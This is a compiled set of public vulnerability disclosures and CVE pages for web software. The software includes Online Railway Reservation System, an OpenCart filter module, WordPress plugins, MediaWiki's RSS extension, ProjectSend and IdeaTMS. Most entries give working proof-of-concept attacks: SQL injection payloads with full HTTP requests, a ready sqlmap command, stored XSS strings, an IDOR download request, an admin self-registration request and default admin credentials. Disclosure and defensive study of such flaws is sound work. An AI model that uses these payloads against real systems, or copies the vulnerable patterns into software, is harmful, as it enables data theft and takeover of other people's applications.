Online Railway Reservation System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_schedule.

**Online Railway Reservation System v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html

Vulnerability File: /orrs/classes/Master.php?f=delete\_schedule

Vulnerability location: /orrs/classes/Master.php?f=delete\_schedule, id=

Current database name: orrs\_db,length is 7

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /orrs/classes/Master.php?f\=delete\_schedule HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/orrs/admin/?page=schedules
Content-Length: 65
Cookie: PHPSESSID=hea24clorqs9kplqalqihp0ik4
Connection: close
id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-33060: bug_report/SQLi-8.md at main · k0xx11/bug_report

Online Railway Reservation System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/inquiries/view_details.php.

Permalink

Cannot retrieve contributors at this time

**Online Railway Reservation System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html

Vulnerability File: /orrs/admin/inquiries/view\_details.php?id=

Vulnerability location: /orrs/admin/inquiries/view\_details.php?id=, id

dbname = orrs\_db

\[+\] Payload: /orrs/admin/inquiries/view\_details.php?id=-1%27%20union%20select%201,database(),3,4,5,6,7--+ // Leak place ---> id

GET /orrs/admin/inquiries/view\_details.php?id\=\-1%27%20union%20select%201,database(),3,4,5,6,7\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=hea24clorqs9kplqalqihp0ik4
Connection: close

CVE-2022-33042: bug_report/SQLi-1.md at main · 736335151/bug_report

MetaMask before 10.11.3 might allow an attacker to access a user's secret recovery phrase because an input field is used for a BIP39 mnemonic, and Firefox and Chromium save such fields to disk in order to support the Restore Session feature, aka the Demonic issue.

The Security Research Team at Halborn has discovered a critical vulnerability affecting many major cryptocurrency wallets. Wallets that were affected include MetaMask, Brave, Phantom, and xDefi, who have remediated the issue. 

Under the right conditions, the vulnerability – which we code-named “**Demonic**” – can expose a crypto wallet user’s secret recovery phrase which can in turn be used to reconstruct their private key, allowing attackers to access billions of dollars worth of cryptocurrencies and NFTs held in browser extension wallets.

You can view the full technical details and remediation recommendations on the Demonic Vulnerability announcement page. Refer to the MetaMask Blog Post and Phantom Blog Post for more useful information from their teams.

Due to the severity of the vulnerability and the number of impacted users, technical details were kept confidential until a good faith effort could be made to contact affected wallet providers.  

Now that the wallet providers have had the opportunity to remediate the issue and migrate their users to secure recovery phrases, Halborn is providing in-depth details to raise awareness of the vulnerability and help prevent similar ones in the future.

**How does it work?**

Browser extension cryptocurrency wallets that use an input field for a BIP39 mnemonic can cause the secret recovery phrase to be stored on-disk in plain text where an attacker that has physical or logical access to the device can retrieve it and gain access to the wallet.

**Who is affected? What should they do?**

**Users:** Userswho have imported their browser based crypto wallet using a secret recovery phrase may be impacted. 

The risk is present if all of the following conditions were met:

*   The hard drive was unencrypted
*   The Secret Recovery Phrase was imported into a browser extension wallet using a device that is no longer in the user’s possession or is logically compromised
*   The user used the “Show Secret Recovery Phrase” checkbox to view the seed phrase on-screen during import

It is recommended that users who believe they may be affected migrate to a new set of accounts. MetaMask has prepared instructions on how to migrate for their users. 

Rotating passwords/keys and the use of a hardware wallet in conjunction with the browser based wallet can also provide increased security for users. Enabling local disk encryption is another best practice which mitigates this issue.

Desktop application cryptocurrency wallets and web based wallets may be prone to similar issues but due to the disparity of offerings we have not investigated that in depth.

**Wallet Providers:** Wallet Providers who believe they may still be susceptible to the vulnerability are strongly encouraged to follow the mitigation suggestions outlined on the Demonic Vulnerability Disclosure page.

Have concerns, want to learn more, or have a bug you’d like to disclose? Please reach out to us at \[email protected\].

Halborn is hiring! If you’re someone who can help make our products and this industry more secure, consider joining our team.

Rob Behnke  
06.15.2022

CVE-2022-32969: Halborn Discovers Critical Vulnerability Affecting Crypto Wallet Browser Extensions

The So Filter Shop By module for OpenCart version 3.x suffers from a remote blind SQL injection vulnerability.

    # Exploit Title: OpenCart v3.x So Filter Shop By - Blind SQL Injection# Date: 28/06/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.opencart.com/# Software Link: https://codecanyon.net/item/so-filter-shop-by-responsive-opencart-module/13945633# Version: V3.X# Tested on: XAMPP, Linux# Contact: https://twitter.com/dmaral3noz* Description :So Filter Shop By Module is compatible with any Opencart allows SQL Injection via parameter 'att_value_id , manu_value_id , opt_value_id , subcate_value_id ' in /index.php?route=extension/module/so_filter_shop_by/filter_data. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.* Sqlmap command :sqlmap -u 'http://127.0.0.1/index.php?route=extension/module/so_filter_shop_by/filter_data' --data "att_value_id=saud&category_id_path=80&condition_search=AND&isFilterShopBy=1&manu_value_id=&maxPrice=1&minPrice=0&opt_value_id=&product_arr_all=70%2C72%2C75%2C74%2C73%2C71&product_id_in=70%2C72%2C75%2C74%2C73%2C71&subcate_value_id=&text_search=saud" -p "att_value_id" --method POST --level=5 --risk=3 --dbs --random-agentRequest :===========POST /index.php?route=extension/module/so_filter_shop_by/filter_data HTTP/1.1Content-Type: application/x-www-form-urlencodedCookie: OCSESSID=aaf920777d0aacdee96eb7eb50Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflateContent-Length: 29Host: 127.0.0.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0Connection: Keep-aliveatt_value_id=1&category_id_path=80&condition_search=AND&isFilterShopBy=1&manu_value_id=&maxPrice=1&minPrice=0&opt_value_id=&product_arr_all=70%2C72%2C75%2C74%2C73%2C71&product_id_in=70%2C72%2C75%2C74%2C73%2C71&subcate_value_id=&text_search=saud===========Output :Parameter: att_value_id (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause    Payload: att_value_id=-7402) OR 6808=6808 AND (4992=4992&category_id_path=80&condition_search=AND&isFilterShopBy=1&manu_value_id=&maxPrice=1&minPrice=0&opt_value_id=&product_arr_all=70,72,75,74,73,71&product_id_in=70,72,75,74,73,71&subcate_value_id=&text_search=saud    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: att_value_id=1) AND (SELECT 6365 FROM (SELECT(SLEEP(5)))qqBP) AND (7704=7704&category_id_path=80&condition_search=AND&isFilterShopBy=1&manu_value_id=&maxPrice=1&minPrice=0&opt_value_id=&product_arr_all=70,72,75,74,73,71&product_id_in=70,72,75,74,73,71&subcate_value_id=&text_search=saud

OpenCart 3.x So Filter Shop By SQL Injection

WordPress Simple Page Transition plugin version 1.4.1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WordPress Plugin ‘Simple Page Transition’  - Stored CrossSite Scripting# Date: 27-06-2022# Exploit Author: Mariam Tariq - HunterSherlock# Vendor Homepage: https://wordpress.org/plugins/simple-page-transition/# Version: 1.4.1# Tested on: Firefox# Contact me: mariamtariq404@gmail.com*#Vulnerable code*:```<label for="simple_page_transition_ignored"><?php _e( 'Ignored DownloadLinks', 'spt' ); ?></label><br /><input type="text" id="simple_page_transition_ignored"name="simple_page_transition_ignored" value="*<?php print$simple_page_transition_ignored; ?>*" /><br />```*#POC:*1- Install the plugin ‘simple page transition’ & activate it.2- Navigate towards the “ignored download links”3- Enter the XSS payload ` *“><img src=x onerror=alert(1)>*`*#POC image:*https://imgur.com/yzaTkhi

WordPress Simple Page Transition 1.4.1 Cross Site Scripting

WordPress W-DALIL plugin version 2.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WordPress Plugin W-DALIL  - Stored Cross Site Scripting# Date: 27-06-2022# Exploit Author: Mariam Tariq - HunterSherlock# Vendor Homepage: https://wordpress.org/plugins/w-dalil/# Version: 2.0# Tested on: Firefox# Contact me: mariamtariq404@gmail.com#Vulnerable Code:```<input class="dalil_input" name="dalil-address" type="text"placeholder="<?php echo __('Dalil item address','w-dalil'); ?>"value="<?php echo $dalil_information['dalil-address']; ?>"  />```#Steps To Reproduce :1 - First Install the plugin  "*w-dalil*" and activate it.2 - Go to Dalil —> Add New Dalil item3 - Inside the “*Dalil item address*” enter XSS payload “*><img src=xonerror=alert(1)>*" and hit enter.#Poc Image :https://imgur.com/JPG97oh

WordPress W-DALIL 2.0 Cross Site Scripting

A vulnerability, which was classified as problematic, was found in ProjectSend r754. This affects an unknown part of the file process.php?do=zip_download. The manipulation of the argument client/file leads to information disclosure. It is possible to initiate the attack remotely.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives**

_From_: Vulnerability Lab <research () vulnerability-lab com>  
_Date_: Wed, 22 Feb 2017 13:54:15 +0100  

Document Title:
===============
ProjectSend r754 - IDOR & Authentication Bypass Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get\_content.php?id=2031

Release Date:
=============
2017-02-21


Vulnerability Laboratory ID (VL-ID):
====================================
2031


Common Vulnerability Scoring System:
====================================
5.3


Product & Service Introduction:
===============================
ProjectSend is a self-hosted application (you can install it easily on your own VPS or shared web hosting account) that 
lets 
you upload files and assign them to specific clients that you create yourself! Secure, private and easy. No more 
depending 
on external services or e-mail to send those files.

(Copy of the Homepage: http://www.projectsend.org/ )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a idor and authentication bypass vulnerability in the 
ProjectSend-r754 web-application.


Vulnerability Disclosure Timeline:
==================================
2017-02-20: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
GNU GPL License
Product: ProjectSend r754


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
An insecure direct object references occured in case of an application provides direct access to objects based on 
user-supplied input. 
As a result of this vulnerability attackers can bypass authorization and to access resources in the system. Insecure 
Direct Object References 
allows attackers to bypass authorization and access resources directly by modifying the value of a parameter\[client\] 
used. Thus finally point 
to other client account names, which allows an attackers to download others clients private data with no secure method 
provided.

Vulnerability Method(s):
\[+\] GET

Vulnerable Module(s):
\[+\] process.php?do=zip\_download

Vulnerable Parameter(s):
\[+\] client
\[+\] file


Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers with low privilege web-application user account and low 
user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to 
continue.

1. User "A" as attacker checks a file to download as zip extension, then click download to modifiy values as required 
...

2. Application responds with the client file list, so then you are able to download all other side user B data files 
with zip extension  

--- PoC Session Logs ---
GET /ProjectSend-r754/process.php?do=zip\_download&client=\[CLIENTNAME\]&files%5B%5D=2 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: \*/\*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://localhost/ProjectSend-r754/my\_files/
Cookie: PHPSESSID=kb0uotq6mssklf213v4a7fje47
Connection: keep-alive
-
HTTP/1.1 200 OK
Date: Sun, 05 Feb 2017 19:07:41 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.44-0+deb7u1
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 6

Name of Files: .jpg


Video PoC:
https://www.youtube.com/watch?v=Xc6Jg9I7Pj4

Security Risk:
==============
The security risk of the web vulnerability in the ProjectSend-r754 web-application function is estimated as medium. 
(CVSS 5.3)


Credits & Authors:
==================
Lawrence Amer - Vulnerability Laboratory \[Research Team\] - (http://lawrenceamer.me) 
(https://www.vulnerability-lab.com/show.php?user=Lawrence Amer)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all 
warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or 
its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special 
damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or 
limitation of liability mainly for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody 
to break any licenses, policies, 
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                              - 
www.evolution-sec.com
Section:    magazine.vulnerability-lab.com      - vulnerability-lab.com/contact.php                             - 
evolution-sec.com/contact
Social:     twitter.com/vuln\_lab                - facebook.com/VulnerabilityLab                                 - 
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss\_upcoming.php                    - 
vulnerability-lab.com/rss/rss\_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php         - 
vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file, resources or information requires 
authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the 
use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other 
information on this website is trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact 
(admin@) to get a ask permission.

                                    Copyright © 2017 | Vulnerability Laboratory - \[Evolution Security GmbH\]™

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com



\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **ProjectSend r754 - IDOR & Authentication Bypass Vulnerability** _Vulnerability Lab (Feb 22)_

CVE-2017-20101: Full Disclosure: ProjectSend r754 - IDOR & Authentication Bypass Vulnerability

In the RSS extension for MediaWiki through 1.38.1, when the $wgRSSAllowLinkTag config variable was set to true, and a new RSS feed was created with certain XSS payloads within its description tags and added to the $wgRSSUrlWhitelist config variable, stored XSS could occur via MediaWiki's template system whenever that feed was loaded via the rss document tag.

**

XSS in Extension:RSS when $wgRSSAllowLinkTag = true;

Closed, ResolvedPublicSecurity



**

*   Edit Task
*   Edit Related Tasks...
*   Edit Related Objects...

*   Mute Notifications
*   Protect as security issue
*   Award Token
*   Flag For Later

This is a WMF deployed extension, however $wgRSSAllowLinkTag is false on cluster, so it is not vulnerable in the configuration used by WMF.

RSS extension implementation of strip markers suffers from a similar problem as MW core's used to before T110143 was fixed. When $wgRSSAllowLinkTag is set to true, you can use this to escape from an attribute.

As an example:

*   Set $wgRSSAllowLinkTag = true;

Create an rss feed as follows:

<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
        \>

<channel>
        <title>Test</title>
<item>
                <title>First item</title>
                <link>https://example.com</link>
                    
                                        <description><!\[CDATA\[<a title="tabindex=1 autofocus onmouseover=alert(1) onfocus=blur() onblur=alert(document.domain)//"> Should autotrigger on chrome, and trigger on hover on firefox</a> \]\]></description>
</item>
</channel>
</rss>

*   Be sure the above RSS feed is added to $wgRSSUrlWhitelist
*   Create a template named Template:RSS containing only

<div title="{{{description}}}"></div>

*   Use the following tag on a page <rss templatename=RSS>http://address.of.rss.feed.from.above</rss>

This should make an XSS that autotriggers on chrome, and triggers on hoover in firefox.

Best solution, is to probably copy what MW core does for strip markers with them including "'

Author Affiliation

Wikimedia Communities

*   Mentions

**Event Timeline**

Comment Actions

Its related to the custom strip marker scheme, i'm not sure if that's what is being referred to in the other task. The code path involved here is the one using the Sanitizer, not the one with a custom escaping function.

The actual escapeTemplateParameter isn't really a security boundry most of the time except when used with insertStripItem, since the results get parsed later in most cases.

Comment Actions

Proposed patch

Extension doesn't seem to have a maintainer to CC on this task. I assume I should not just throw on gerrit since its WMF deployed, even if this code path is not enabled on cluster.

Comment Actions

> Extension doesn't seem to have a maintainer to CC on this task. I assume I should not just throw on gerrit since its WMF deployed, even if this code path is not enabled on cluster.

Since ext:RSS isn't bundled, it would go out with the next supplemental release, which is tracked at T305209. I've added it there for now. Since this isn't currently vulnerable within Wikimedia production (and likely wouldn't ever be) I'd consider it low risk pushing it through gerrit. I think the only concern would be if other mediawiki operators were left uninformed or vulnerable for some time period, but IME we've tended not to care about that as much in the past and have just tried to merge security bug fixes quickly, make tasks public and send out the supplemental release each quarter, as best efforts.

Content licensed under Creative Commons Attribution-ShareAlike 3.0 (CC-BY-SA) unless otherwise noted; code licensed under GNU General Public License (GPL) or other open source licenses. By using this site, you agree to the Terms of Use, Privacy Policy, and Code of Conduct. · Wikimedia Foundation · Privacy Policy · Code of Conduct · Terms of Use · Disclaimer · CC-BY-SA · GPL

CVE-2022-34491: ⚓ T307028 XSS in Extension:RSS when $wgRSSAllowLinkTag = true;

A vulnerability exists in Online Student Rate System v1.0 that allows any user to register as an administrator without needing to be authenticated.

**CVE-2021-39409**

Admin account registration is possible in Online Student Rate System v1.0, allowing a malicious actor to create an admin account and access the admin panel.

**Vulnerability**

    POST /ajax.php?action=signup HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 105
    Origin: http://localhost
    Connection: close
    Referer: http://localhost
    
    username=testaccount&passsword=098f6bcd4621d373cade4e832627b4f6&userLevelId=-1&email=example@example.com

CVE-2021-39409: GitHub - StefanDorresteijn/CVE-2021-39409: Admin account registration in Online Student Rate System

IdeaTMS 2022 is vulnerable to SQL Injection via the PATH_INFO

Vulnerability Type: SQL Injection Vulnerability (Boolean-Based Blind)

Vendor of Product: Ideaco.ir

Affected Product Code Base: IdeaTMS

Product Version: 2022

Description: IdeaTMS allows SQL Injection via the PATH\_INFO

Attack Vectors: Attacker should inject malicious payload into PATH\_INFO

Attack Type: Remote

Payload: zsuuiI8Y'%3b%20waitfor%20delay%20'0:0:20'%20--%20

Assigned CVE-ID: <TBD>

Discoverer: Mohammad Reza Ismaeli Taba, Raspina Net Pars Group (RNPG Ltd.)

Steps To Reproduce

1\. Browse the following page: https://<target.xyz>/IdeaWeb/PersonnelInfo/InfoDetails/\[PATH\_INFO\]

2\. Insert the malicious query as the value in PATH\_INFO

Example: https://<target.xyz>/IdeaWeb/PersonnelInfo/InfoDetails/zsuuiI8Y'%3b%20waitfor%20delay%20'0:0:20'%20--%20

#PoC

GET /IdeaWeb/PersonnelInfo/InfoDetails/zsuuiI8Y'%3b%20waitfor%20delay%20'0:0:20'%20--%20 HTTP/1.1

Host: <address in which IdeaTMS is set up>

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Tag

#firefox